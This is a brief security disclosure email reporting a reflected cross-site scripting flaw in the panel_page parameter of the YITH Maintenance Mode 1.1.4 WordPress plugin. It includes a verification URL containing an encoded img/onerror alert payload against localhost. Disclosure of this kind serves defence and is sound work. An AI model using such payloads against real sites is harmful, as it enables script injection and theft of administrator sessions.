Subject: Cross-Site Scripting (XSS) in YITH Maintenance Mode 1.1.4

Date: Fri, 21 Aug 2015 11:57:18 +0200

Hello,

Plugin: YITH Maintenance Mode 1.1.4 https://wordpress.org/plugins/yith-maintenance-mode/

1. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can store html/js code (there is no CSRF protection).

Method: GET/POST

Url: http://localhost/wp-admin/themes.php?page=yith-maintenance-mode&panel_page=[xss]

Vulnerable parameters: panel_page

Example PHP callstack:

YITH_Panel::display_panel_page [/yith-maintenance-mode/yit-common/yith-panel.php:163]

Verification:

http://localhost/wp-admin/themes.php?page=yith-maintenance-mode&panel_page=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,